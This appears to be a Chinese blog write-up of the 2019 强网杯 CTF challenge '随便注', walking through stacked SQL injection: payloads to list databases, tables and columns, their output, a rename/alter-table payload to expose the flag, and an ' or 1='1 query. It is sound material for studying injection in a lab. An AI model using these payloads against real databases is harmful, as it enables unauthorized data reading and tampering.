[强网杯 2019]随便注 堆叠注入

[强网杯 2019]随便注 堆叠注入

11/20/2020

多云 轻松

.-------------------------------------------------------------------.

所谓堆叠注入，就是一次性执行多条查询语句

获取数据库

?inject=1';show databases;--+

[OUTPUT]:
array(1) {
[0]=>
string(11) "ctftraining"
}

array(1) {
[0]=>
string(18) "information_schema"
}

array(1) {
[0]=>
string(5) "mysql"
}

array(1) {
[0]=>
string(18) "performance_schema"
}

array(1) {
[0]=>
string(9) "supersqli"
}

array(1) {
[0]=>
string(4) "test"
}

看到了所有的数据库

查看数据表

?inject=1';show tables;--+

[OUTPUT]:
array(1) {
[0]=>
string(16) "1919810931114514"
}

array(1) {
[0]=>
string(5) "words"
}

查看字段信息

?inject=1';show columns from `1919810931114514`; --+
[OUTPUT]:
array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}

原题目查询的数据表为words。既然没过滤 alert 和 rename，那就可以把表和列改名。先把 words 改为其他，再把1919810931114514改为 words，然后把新的 words 表里的 flag 列改为 id ，这样就可以直接查询 flag 了

payload如下：

-1';
rename table `words` to `test`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);
show columns from words;--+
# ALTER TABLE tiger (表名) CHANGE tigername(要修改的列) name (修改后的列名) VARCHAR(20)(类型);

使用 /?inject=1’ or 1='1 访问一下即可获得 flag

MySQL中反引号和单引号的区别与用法

MySql 中用一对反引号来标注 SQL 语句中的标识，如数据库名、表名、字段名等
引号则用来标注语句中所引用的字符型常量或日期/时间型常量，即字段值
例如：

select * from `username` where `name`="peri0d"

ps:原来desc 可以查看数据表的结构！！！